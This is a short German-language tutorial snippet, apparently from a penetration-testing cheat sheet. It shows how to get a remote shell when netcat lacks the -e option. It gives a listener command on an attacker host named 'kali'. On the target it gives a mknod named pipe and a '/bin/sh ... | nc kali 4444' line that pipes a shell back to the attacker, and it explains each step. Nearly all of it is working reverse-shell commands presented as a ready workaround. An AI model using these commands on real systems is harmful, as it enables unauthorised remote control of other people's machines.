Manch ein netcat unterstützt nicht die Option -e, sodass eine Remote-Shell über „-e /bin/bash“ nicht funktioniert. Die Abhilfe:
kali# nc -nvlp 4444
host# mknod /tmp/pipe p
host# /bin/sh 0</tmp/pipe | nc kali 4444 1>/tmp/pipe
Eine Named Pipe erstellen. Die Named Pipe zur Eingabe der Shell lenken, die Ausgabe der Shell nach netcat pipen und die Ausgabe von netcat in die Named Pipe umlenken. Fertig ist der Workaround..
